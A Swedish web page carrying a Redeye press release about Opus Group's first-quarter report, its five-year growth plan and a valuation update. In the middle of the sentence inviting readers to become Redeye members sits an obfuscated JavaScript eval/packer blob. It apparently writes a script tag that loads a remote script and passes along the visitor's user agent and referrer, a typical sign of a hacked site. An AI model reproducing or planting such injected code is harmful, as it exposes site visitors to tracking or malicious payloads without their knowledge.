Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Redeye: Ett par pusselbitar på plats i Opus Group

Redeye: Ett par pusselbitar på plats i Opus Group
Sebastian

Opus Group hade en bra inledning på året och Q1-rapporten var genomgående lite bättre än vi räknat med. I februari presenterades en ny ambitiös tillväxtplan för kommande fem år och vi har redan sett ett par steg tas på vägen mot det långsiktiga målet. Dels Argentina där Opus nu redan är igång och dels i Pakistan där de nu har möjlighet att expandera till en ny stor provins. Vi har finjusterat prognoserna och gjort små förändringar i rating och avkastningskrav, men behåller vår värdering i princip oförändrad med drygt 35 procent uppsida till Base case.

Läs mer och ladda ned analysen av Henrik Alveskog på: https://goo.gl/naDguH

Bli eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ysete|var|u0026u|referrer|nhrdd||js|php’.split(’|’),0,{}))
medlem hos Redeye för att få tillgång till de senaste analyserna och uppdateringarna.

Detta är ett pressmeddelande från Redeye – Research Powered Investment Banking. http://beta.redeye.se/